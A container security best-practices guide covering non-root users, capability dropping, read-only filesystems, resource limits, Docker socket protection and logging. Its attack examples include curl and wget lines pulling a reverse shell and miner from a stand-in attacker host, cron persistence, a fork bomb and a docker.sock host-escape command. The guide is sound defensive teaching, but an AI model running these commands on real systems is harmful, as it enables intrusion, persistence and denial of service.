How To Secure Your Containers? 6 Practical Security Best Practices You Don't Want To Miss
A single misconfigured container gave attackers root access to an entire Kubernetes cluster in the Tesla breach. The attack path was shockingly simple:
Found publicly exposed Kubernetes dashboard (no authentication)
Deployed privileged container
Mounted host filesystem
Gained root on all cluster nodes
Installed crypto-mining software across 100+ EC2 instances
If you’re building your container security strategy and don’t know where to start, this guide covers the 6 critical controls (in priority order) that prevent container escapes and host compromise.
Critical Control
Run containers as non-root
Drop unnecessary capabilities
High Priority
Make containers read-only (immutable)
Limit resources (prevent DoS)
Important
Secure Docker socket access
Enable comprehensive logging
Let’s dive in.
1. Run Containers as Non-Root Users
Containers run as root by default. This creates a dangerous privilege escalation:
Non-root user on host → Starts container → Container runs as root
Without user namespace enabled, root inside the container is root on the host.
If an attacker can escape a container that is running as root, they have full root access to the host machine, which means:
Access to all files on the host
Lateral movement across the network
Ability to read secrets from other containers
Ability to deploy additional malicious containers
Real-World Attack Example
Docker Hub Cryptojacking (2019):
1. Attacker deployed malicious image to Docker Hub
2. Image ran as root by default
3. Container escaped via kernel exploit
4. Gained root on host
5. Deployed cryptominers across entire infrastructure
Cost: Thousands in unauthorized AWS charges before detection
So, What’s the Solution?
Option 1: Set Non-Root User in Dockerfile (Recommended)
FROM nginx:alpine
# Create non-root user
RUN addgroup -g 1000 appuser && adduser -D -u 1000 -G appuser appuser
# Install tools BEFORE switching user (still root here)
RUN apk add --no-cache libcap curl wget
# Change nginx to listen on 8080: find and replace port 80 in the nginx config file.
RUN sed -i 's/listen\s*80;/listen 8080;/g' /etc/nginx/conf.d/default.conf && \
sed -i 's/listen\s*\[::\]:80;/listen [::]:8080;/g' /etc/nginx/conf.d/default.conf
# Change ownership of necessary directories
RUN chown -R appuser:appuser /var/cache/nginx && \
chown -R appuser:appuser /var/log/nginx && \
chown -R appuser:appuser /etc/nginx/conf.d && \
# nginx.pid is owned by root by default; create it and hand /run over to appuser
touch /run/nginx.pid && \
chown -R appuser:appuser /run
# Switch to non-root user
USER appuser
# Use port > 1024 (non-root can't bind to ports < 1024)
EXPOSE 8080
Why this is better: Baked into the image, works everywhere, can't be overridden accidentally.
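To audit existing Dockerfiles for this control, a small script can report which user the final build stage ends up running as. The following is a minimal sketch, not a full Dockerfile parser: the function names `final_user` and `runs_as_root` are hypothetical, it assumes every base image starts as root, and it does not expand `ARG`/`ENV` variables.

```python
import re

# User values that mean "root" in a USER instruction.
ROOT_NAMES = {"root", "0"}


def final_user(dockerfile_text: str) -> str:
    """Return the user of the last build stage ('root' if no USER is set)."""
    user = "root"
    for raw in dockerfile_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        if re.match(r"(?i)^FROM\s", line):
            # Assumption: each new stage starts as root again.
            user = "root"
            continue
        match = re.match(r"(?i)^USER\s+(\S+)", line)
        if match:
            user = match.group(1)
    return user


def runs_as_root(dockerfile_text: str) -> bool:
    """True if the final stage runs as root (by name or UID 0)."""
    name = final_user(dockerfile_text).split(":")[0]
    return name in ROOT_NAMES
```

Running `runs_as_root(open("Dockerfile").read())` in CI is one way to fail a build before a root image is ever published.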
Option 2: Specify User at Runtime
# Docker
docker run --user 1000:1000 -p 8080:8080 myapp:latest
# Docker Compose
services:
web:
image: myapp:latest
user: "1000:1000"
# Kubernetes
apiVersion: v1
kind: Pod
metadata:
name: myapp
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000
runAsGroup: 1000
containers:
- name: app
image: myapp:latest
Verify It's Working
# Check which user the container is running as
docker exec <container-id> whoami
# Expected output: appuser (NOT root)
# Or check process owner
docker exec <container-id> ps aux
# Expected: Processes owned by appuser (UID 1000)
# Kubernetes verification
kubectl exec <pod-name> -- whoami
# Expected output: appuser
2. Drop Unnecessary Capability Privileges
Linux splits root's power into roughly 40 distinct capabilities that determine which privileged operations a process can perform.
By default, Docker grants containers 14 of them, far more than most applications need.
Common capabilities Docker grants by default
CAP_NET_BIND_SERVICE - Bind to ports below 1024.
CAP_NET_RAW - Use RAW & PACKET sockets (for ping, traceroute).
CAP_CHOWN - Change file ownership.
CAP_DAC_OVERRIDE - Bypass file permission checks.
CAP_FOWNER - Bypass permission checks on operations that normally require file ownership.
CAP_SETUID / CAP_SETGID - Change user/group IDs.
CAP_SYS_CHROOT - Use chroot().
High-risk capabilities that are not in the default set but are often added (or granted via --privileged)
CAP_SYS_ADMIN - Mount filesystems, many admin ops.
CAP_SYS_MODULE - Load/unload kernel modules.
CAP_SYS_PTRACE - Trace/debug processes.
Each unnecessary capability is an attack vector.
If an attacker gains code execution in your container, these capabilities determine what they can do next.
Real Attack Scenario
Capability Abuse Chain:
1. Attacker exploits RCE vulnerability in web app
2. Container has CAP_SYS_ADMIN (not needed for the app)
3. Attacker uses this capability to mount host filesystem
4. Reads /etc/shadow from host
5. Cracks passwords, gains SSH access to host
6. Full infrastructure compromise
Audit Your Current Capabilities
# Check what capabilities your container currently has
docker run --rm -it alpine sh -c 'apk add -U libcap; capsh --print | grep Current'
# Output example (default set; running with --privileged would list every capability instead):
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,
cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,
cap_mknod,cap_audit_write,cap_setfcap=eip
That’s 14 capabilities. Does your app need all of them?
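When capsh is not available inside an image, the same information can be read as a hex bitmask from the `CapEff` line of `/proc/1/status` (for example via `docker exec <container-id> grep CapEff /proc/1/status`). The sketch below decodes such a mask into capability names. The helper name `decode_caps` is hypothetical, and the table follows the bit order in the Linux capability header, so bits added by newer kernels would simply be ignored.

```python
# Capability names indexed by bit number (order as in linux/capability.h).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_caps(hex_mask: str) -> list[str]:
    """Turn a CapEff-style hex bitmask into a list of capability names."""
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)]


# Docker's default set of 14 capabilities corresponds to this mask.
DEFAULT_DOCKER_MASK = "00000000a80425fb"
print(decode_caps(DEFAULT_DOCKER_MASK))
```

A mask of all zeros means every capability was dropped; seeing `CAP_SYS_ADMIN` in the decoded list is a strong signal that the container is over-privileged.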
The Solution: Drop All, Add Only What’s Needed
# Drop all capabilities, add only NET_BIND_SERVICE (if needed)
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE myapp:latest
Docker Compose
services:
web:
image: myapp:latest
cap_drop:
- ALL
cap_add:
- NET_BIND_SERVICE # Only if binding to port < 1024
Kubernetes
apiVersion: v1
kind: Pod
metadata:
name: myapp
spec:
containers:
- name: app
image: myapp:latest
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE # Only if needed
Verify it’s working
# Check container's actual capabilities
docker inspect <container-id> | jq '.[0].HostConfig.CapDrop'
# Expected: ["ALL"]
docker inspect <container-id> | jq '.[0].HostConfig.CapAdd'
# Expected: ["NET_BIND_SERVICE"] or null
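# Verify at runtime (installing libcap needs root and a writable filesystem, so run this before locking those down)
docker exec <container-id> sh -c 'apk add libcap && capsh --print | grep Current'
# Should show minimal capabilities
# Alternative that needs no extra packages: read the effective capability bitmask of PID 1
docker exec <container-id> grep CapEff /proc/1/status
3. Make Containers Immutable (Read-Only Filesystem)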
By default, containers have read-write access to their entire filesystem. This allows attackers to:
Download additional tools (curl, wget, netcat)
Install backdoors and persistence mechanisms
Modify application code
Write malicious scripts
Create new files for data exfiltration
This is a failure of drift prevention: the container ends up running executables that weren’t present when the image was scanned.
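Drift can also be observed after the fact. `docker diff <container-id>` lists filesystem changes relative to the image, one per line, prefixed with A (added), C (changed) or D (deleted). The sketch below groups such output so that unexpected additions stand out. The function name `summarize_drift` and the sample paths are hypothetical, and the output is assumed to be passed in as plain text.

```python
def summarize_drift(diff_output: str) -> dict[str, list[str]]:
    """Group `docker diff` lines into added / changed / deleted paths."""
    kinds = {"A": "added", "C": "changed", "D": "deleted"}
    result: dict[str, list[str]] = {"added": [], "changed": [], "deleted": []}
    for line in diff_output.splitlines():
        parts = line.split(maxsplit=1)  # "<kind> <path>"
        if len(parts) == 2 and parts[0] in kinds:
            result[kinds[parts[0]]].append(parts[1])
    return result


# Hypothetical output captured from a compromised container.
sample = "C /tmp\nA /tmp/shell.sh\nC /app\nC /app/server.py\nA /miner\n"
print(summarize_drift(sample)["added"])
```

In a container that is meant to be immutable, any non-empty `added` list is worth an alert.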
Real Attack Example: Container Drift Attack
1. Attacker exploits RCE in web application
2. Downloads reverse shell: curl attacker.com/shell.sh > /tmp/shell.sh
3. Installs crypto miner: wget attacker.com/miner && chmod +x miner
4. Modifies application code: echo "backdoor" >> /app/server.py
5. Creates persistence: echo "*/5 * * * * /tmp/shell.sh" > /etc/crontab
If the filesystem were read-only, steps 2-5 would all fail.
The Solution: Enable Read-Only Filesystem
Docker
docker run \
--name myapp \
--read-only \
--user 1000:1000 \
--cap-drop=ALL \
--cap-add=NET_BIND_SERVICE \
--tmpfs /tmp:rw,noexec,nosuid,size=100m,uid=1000,gid=1000 \
--tmpfs /var/run:rw,noexec,nosuid,size=50m,uid=1000,gid=1000 \
--tmpfs /var/cache/nginx:rw,size=100m,uid=1000,gid=1000 \
-p 8080:8080 \
myapp:latest
Why tmpfs? Applications often need to write temporary files. tmpfs creates a temporary, in-memory filesystem that:
Allows writes (needed for temp files)
Prevents execution (noexec flag)
Gets wiped on container restart
Never touches the host disk
Note: tmpfs always overrides Dockerfile permissions at runtime.
Dockerfile chown → sets ownership in the IMAGE
--tmpfs mount → creates a BRAND NEW empty filesystem at runtime
and mounts it OVER the image directory
wiping out any ownership you set in Dockerfile
So the sequence at runtime is:
1. Container starts
2. Image layers loaded (your chown is here ✓)
3. --tmpfs mounts fresh empty filesystem OVER /var/cache/nginx ← hides the chowned directory!
4. New tmpfs is owned by root by default, hence uid and gid are required at runtime.
5. nginx (running as appuser) can write, because the tmpfs is now owned by appuser
Verify It’s Working
# 1. Check read-only status
docker inspect <container-id> | jq '.[0].HostConfig.ReadonlyRootfs'
# Expected: true
# 2. Try to write a file (should fail)
docker exec <container-id> touch /test.txt
# Expected: "Read-only file system" error
# 3. Verify tmpfs mounts exist and work
docker exec <container-id> df -h | grep tmpfs
# Expected: Shows /tmp, /var/run mounted as tmpfs
docker exec <container-id> touch /tmp/test.txt
# Expected: Success (tmpfs is writable)
# 4. Try to execute from tmpfs (should fail due to noexec)
docker exec <container-id> sh -c 'echo "#!/bin/sh" > /tmp/test.sh && chmod +x /tmp/test.sh && /tmp/test.sh'
# Expected: "Permission denied" (noexec prevents execution)
Deploy Golden Image Containers (GCI)
What are Golden Images? Pre-built hardened base images with all required software already installed.
Benefits:
No package installation at runtime (prevents drift)
Faster container startup (no apt-get/yum during boot)
Consistent versions across all containers
Scan once, deploy everywhere.
4. Limit Resource Usage (Prevent DoS)
By default, containers have unlimited access to host resources:
CPU
Memory
Disk I/O
Process count
A single compromised container can:
Consume 100% CPU (starve other containers)
Exhaust all memory (crash the host)
Fork-bomb with unlimited processes (DoS)
Fill disk with logs (crash the host)
Real Attack Example: Resource Exhaustion
# Attacker gains access to container without resource limits
# Launches fork bomb:
:(){ :|:& };:
# Or memory exhaustion:
x="x"
while true; do
x="$x$x" # Doubles memory usage each iteration
done
# Result:
# - Host runs out of memory
# - Kernel OOM killer starts killing processes
# - Other containers crash
# - Host becomes unresponsive
# - Manual reboot required
Blast radius: Entire host and all containers.
The Solution: Control Groups (cgroups)
What are cgroups?
Control Groups limit the resources (CPU, memory, I/O, PIDs) that a group of processes can use.
Docker: Limit CPU and Memory
docker run \
--memory="512m" \
--memory-swap="512m" \
--cpus="1.5" \
--pids-limit=100 \
--restart=on-failure:5 \
myapp:latest
Reservations vs Limits
reservations - Minimum resources set aside for the container (Kubernetes calls these requests)
limits - Hard maximum (cannot exceed)
How to Determine Appropriate Limits
Step 1: Measure baseline usage
# Monitor container for 24 hours under normal load
docker stats <container-id>
# Output:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
abc123 myapp 45.5% 320MiB / 512MiB 62.5%
# Peak usage observed: 400MB memory, 1.2 CPU cores
Step 2: Set limits with 20-30% buffer
Observed peak: 400MB
Buffer: 400MB * 1.3 = 520MB
Limit: 512MB (rounded)
Observed peak: 1.2 CPU
Buffer: 1.2 * 1.25 = 1.5 CPU
Limit: 1.5 CPUs
Step 3: Test under load
# Load test the container
ab -n 10000 -c 100 http://localhost:8080/
# Monitor for OOM kills or CPU throttling
docker stats <container-id>
docker events --filter 'event=oom'
Step 4: Adjust based on results
If OOMKilled events occur → Increase memory limit
If CPU % constantly at 100% → Increase CPU limit
If no issues after 1 week → Limits are appropriate
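The buffer arithmetic from the steps above can be captured in a small helper so that limits are derived the same way for every service. This is a sketch under stated assumptions: the function names are hypothetical, the 30% and 25% buffers mirror the worked example, and memory is rounded to the nearest 64 MiB step (which, as in the example, may land slightly below the buffered value).

```python
def suggest_limits(peak_mem_mib: float, peak_cpus: float,
                   mem_buffer: float = 0.30, cpu_buffer: float = 0.25,
                   mem_step_mib: int = 64) -> dict:
    """Apply a safety buffer to observed peaks and round memory to a tidy step."""
    buffered_mem = peak_mem_mib * (1 + mem_buffer)
    mem_mib = max(mem_step_mib, round(buffered_mem / mem_step_mib) * mem_step_mib)
    cpus = round(peak_cpus * (1 + cpu_buffer), 2)
    return {
        "memory_mib": mem_mib,
        "memory_bytes": mem_mib * 1024 * 1024,  # the unit docker inspect reports
        "cpus": cpus,
    }


def docker_flags(limits: dict) -> str:
    """Render the limits as docker run flags (swap capped at the memory limit)."""
    return (f"--memory={limits['memory_mib']}m "
            f"--memory-swap={limits['memory_mib']}m "
            f"--cpus={limits['cpus']}")


limits = suggest_limits(peak_mem_mib=400, peak_cpus=1.2)
print(docker_flags(limits))  # --memory=512m --memory-swap=512m --cpus=1.5
```

Re-running the helper with fresh peak numbers after each load test keeps the limits tied to measurements rather than guesses.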
Verify It’s Working
# 1. Check configured limits
docker inspect <container-id> | jq '.[0].HostConfig.Memory'
# Expected: 536870912 (512MB in bytes)
# 2. Test memory limit
docker exec <container-id> sh -c 'cat /dev/zero | head -c 600m | tail'
# Expected: Process killed (OOMKilled) before filling 600MB
# 3. Monitor real-time usage
docker stats <container-id>
# Verify usage stays under limits
# 4. Check for OOM kills in logs
docker events --filter 'event=oom' --since 1h
# Should show OOM events if limit was exceeded
5. Secure Docker Socket
What is the Docker socket?
/var/run/docker.sock is the API endpoint used to control the Docker daemon (service). The owner of this socket is root.
Giving a container access to the Docker socket is equivalent to giving it unrestricted root access to your host.
A compromised container can create, run, and delete any container on the host.
Real Attack Example
# The container has the Docker socket mounted, so it can use the Docker API to create new containers
# Attacker gains access to that container
docker exec -it compromised-container bash
# Inside the container, the attacker starts a new container that mounts the host filesystem (-v /:/host)
# and runs as root (the default):
docker run -it --rm -v /:/host alpine chroot /host bash
# Attacker now has a root shell on the HOST, not just the container
# Can read /etc/shadow, SSH keys, cloud credentials, everything
The Solution:
1. Don’t Mount Socket At All
# Dangerous
docker run -v /var/run/docker.sock:/var/run/docker.sock myapp
# Safe - don't mount it at all
docker run myapp
If your application doesn’t absolutely need Docker API access, don’t give it any access to the socket.
Most applications DON’T need Docker socket access. Common reasons people mount it (and alternatives):
To restart containers - Use Kubernetes liveness/readiness probes.
To deploy new containers - Use a CI/CD pipeline, not in-container deployments.
To get container metrics - Use Prometheus or cloud-native monitoring.
To manage Docker from a web UI - Use a dedicated tool such as Portainer instead of mounting the socket into application containers.
2. Use Podman instead: it's daemonless, so there's no socket running as root.
3. Use a Socket Proxy, if mounting is absolutely necessary:
Instead of mounting the Docker socket directly, use a socket proxy that:
Filters which Docker API calls are allowed
Blocks dangerous operations (mounting volumes, privileged mode)
Logs all API requests
Enforces rate limiting
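The filtering idea behind such a proxy can be illustrated with a small allowlist check. This is a conceptual sketch only and not how any particular proxy is implemented: the `ALLOWED` table and the `is_allowed` helper are hypothetical, and the paths are read-only Docker Engine API endpoints chosen for illustration.

```python
import re

# Hypothetical read-only allowlist: (HTTP method, path pattern) pairs.
ALLOWED = [
    ("GET", re.compile(r"^/_ping$")),
    ("GET", re.compile(r"^/version$")),
    ("GET", re.compile(r"^/containers/json$")),
    ("GET", re.compile(r"^/containers/[A-Za-z0-9_.-]+/json$")),
]

# Docker clients usually prefix paths with an API version such as /v1.43.
VERSION_PREFIX = re.compile(r"^/v\d+\.\d+")


def is_allowed(method: str, path: str) -> bool:
    """Allow a request only if its method and path match the allowlist."""
    path = path.split("?", 1)[0]                      # drop the query string
    path = VERSION_PREFIX.sub("", path, count=1)      # drop the version prefix
    return any(method.upper() == m and p.match(path) for m, p in ALLOWED)


print(is_allowed("GET", "/v1.43/containers/json?all=1"))
print(is_allowed("POST", "/v1.43/containers/create"))
```

Everything not explicitly listed is denied, so creating containers, starting exec sessions and mounting volumes are all blocked by default.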
Examples of proxy solutions include:
Docker Socket Proxy from LinuxServer.io
Socket proxy from Tecnativa.
6. Enable Comprehensive Logging
According to OWASP, breaches took on average 191 days to detect in 2016. More recent IBM Cost of a Data Breach reports show little improvement, with breaches taking roughly 250 to 280 days on average to identify and contain.
Why? Many organisations fail to:
Log container events
Monitor for suspicious activity
Alert on security-relevant actions
Retain logs for forensic analysis
Without logging, attackers operate undetected for months.
What You Should Log (Minimum)
Container Lifecycle Events
# What to capture:
- Container start/stop/restart events
- Image used (name, tag, digest)
- User/service account that initiated the action
- Container configuration (ports, volumes, capabilities)
Access to Secrets and Sensitive Data (detects credential theft and lateral movement)
# What to capture:
- Secret retrieval from secret stores
- Environment variable access
- Volume mounts to sensitive directories
- Failed authentication attempts
Privilege Escalation Attempts (detects attempts to gain elevated privileges)
# What to capture:
- Capability additions (especially CAP_SYS_ADMIN)
- Privileged mode usage (--privileged flag)
- UID/GID changes
- sudo/su usage inside containers
- Root process execution
Network Connections (detects C2 communication and data exfiltration)
# What to capture:
- Inbound connections (source IP, port)
- Outbound connections (destination IP, port, domain)
- DNS queries (especially to unusual TLDs)
- Connection attempts from unexpected countries
Volume Mount Events (detects container escape attempts)
# What to capture:
- Volume mount paths
- Mount permissions (rw vs ro)
- Sensitive mounts (/var/run/docker.sock, /etc, /proc)
Failed Operations (detects reconnaissance and attack attempts)
# What to capture:
- Failed network connection attempts
- Failed file write/read attempts
- Failed permission changes
- Failed capability usage
- API authentication failures
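As a starting point for the lifecycle category, `docker events --format '{{json .}}'` emits one JSON object per event, which a small script can reduce to the fields worth shipping to a log store. The sketch below assumes the event objects carry `Type`, `Action`, `time` and an `Actor` with `ID` and `Attributes` (check this against the Docker version in use); the function name and the selected actions are illustrative choices.

```python
import json

# Container actions treated as lifecycle events in this sketch.
LIFECYCLE_ACTIONS = {"create", "start", "stop", "restart", "die", "kill", "oom", "destroy"}


def lifecycle_records(lines):
    """Extract compact lifecycle records from JSON-formatted docker events."""
    records = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # ignore lines that are not valid JSON
        if event.get("Type") != "container":
            continue
        if event.get("Action") not in LIFECYCLE_ACTIONS:
            continue
        actor = event.get("Actor") or {}
        attrs = actor.get("Attributes") or {}
        records.append({
            "time": event.get("time"),
            "action": event["Action"],
            "container_id": actor.get("ID"),
            "name": attrs.get("name"),
            "image": attrs.get("image"),
        })
    return records
```

Piping the event stream into this function (for example by iterating over `sys.stdin`) gives a record per start, stop or OOM kill that can be forwarded to whichever log pipeline is already in place.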
Log Retention and Analysis
Retention Policy:
Security events - Cold storage for 1 year
Container lifecycle - Warm storage (S3 Standard) for 90 days
Application logs - Hot storage (Elasticsearch) for 30 days
Debug logs - Hot storage (Elasticsearch) for 7 days
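A retention policy like this is easiest to enforce when it lives in code or configuration rather than in a wiki page. The following minimal sketch encodes the table above; the category keys and the `retention_action` helper are hypothetical names, and a real pipeline would more likely express the same rules as lifecycle policies in the storage backend.

```python
# Retention policy from the table above: category -> (storage tier, days to keep).
RETENTION = {
    "security": ("cold", 365),
    "lifecycle": ("warm", 90),
    "application": ("hot", 30),
    "debug": ("hot", 7),
}


def retention_action(category: str, age_days: int) -> str:
    """Return 'keep:<tier>' while a log is within its window, else 'delete'."""
    tier, max_days = RETENTION[category]
    return "delete" if age_days > max_days else f"keep:{tier}"


print(retention_action("security", 200))  # keep:cold
print(retention_action("debug", 8))       # delete
```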
Your Path Forward - Implementation Roadmap
Critical Controls
Audit all containers for root user
Add USER directive to top 5 critical Dockerfiles
Rebuild and deploy with non-root user
Verify: docker exec <container> whoami returns non-root
High Priority Controls
Drop ALL capabilities, add back only needed ones
Add --read-only flag to all containers
Configure tmpfs for /tmp, /var/run
Set memory and CPU limits based on baseline usage
Verify containers still function correctly
Socket Security & Logging
Audit containers with Docker socket mounted
Deploy socket proxy for containers that need Docker API
Remove direct socket mounts
Set up centralized logging (Fluentd/CloudWatch/Splunk)
Configure Falco for runtime security monitoring
Create alerts for critical security events
Golden Images & Refinement
Create 3-5 golden base images
Migrate applications to golden images
Fine-tune resource limits based on production data
Review and tune Falco rules (reduce false positives)
Document all security controls and exceptions
Train team on new security practices
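Several of the audit steps in this roadmap can be combined into one check over the output of `docker inspect <container-id>`. The sketch below is one possible way to do that, not a complete scanner: `audit_container` and its finding messages are hypothetical, and it only looks at the inspect fields named in the code.

```python
import json


def audit_container(inspect_json: str) -> list[str]:
    """Return a list of hardening gaps found in `docker inspect` output."""
    info = json.loads(inspect_json)[0]  # docker inspect returns a JSON array
    host = info.get("HostConfig") or {}
    findings = []

    user = ((info.get("Config") or {}).get("User") or "").split(":")[0]
    if user in ("", "0", "root"):
        findings.append("runs as root")
    if "ALL" not in [c.upper() for c in (host.get("CapDrop") or [])]:
        findings.append("capabilities not dropped")
    if host.get("Privileged"):
        findings.append("privileged mode")
    if not host.get("ReadonlyRootfs"):
        findings.append("root filesystem is writable")
    if not host.get("Memory"):
        findings.append("no memory limit")
    if (host.get("PidsLimit") or 0) <= 0:
        findings.append("no PID limit")
    for mount in info.get("Mounts") or []:
        if (mount.get("Source") or "").endswith("docker.sock"):
            findings.append("Docker socket mounted")
    return findings
```

An empty list means the container passes all seven checks; anything else is a concrete item for the roadmap backlog.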
Final Thought
Many attacks could have been prevented if these 6 controls had been in place:
Resource limits → Mining activity would have been throttled.
Dropped capabilities → Attacker couldn’t escalate privileges.
Non-root user → Attacker couldn’t write to system directories.
Logging → Suspicious activity detected sooner.
Read-only filesystem → Attacker couldn’t download malware.
No Docker socket access → Attacker couldn’t deploy more containers.
Chat Soon,
Kushal



